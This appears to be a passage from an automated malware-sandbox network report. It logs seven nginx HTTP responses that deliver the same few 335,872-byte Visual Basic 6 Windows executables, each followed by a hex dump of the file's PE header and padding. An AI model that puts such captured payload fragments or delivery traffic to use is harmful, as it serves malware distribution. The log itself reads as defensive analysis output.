00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:54:31 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:06:20 GMTConnection: keep-aliveETag: "628c055c-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:54:34 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:29:54 GMTConnection: keep-aliveETag: "628c0ae2-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:54:36 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Wed, 18 May 2022 22:16:07 GMTConnection: keep-aliveETag: "62857027-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:54:38 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:06:20 GMTConnection: keep-aliveETag: "628c055c-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:54:43 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:29:54 GMTConnection: keep-aliveETag: "628c0ae2-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:54:43 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Wed, 18 May 2022 22:16:07 GMTConnection: keep-aliveETag: "62857027-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:54:44 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:06:20 GMTConnection: keep-aliveETag: "628c055c-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
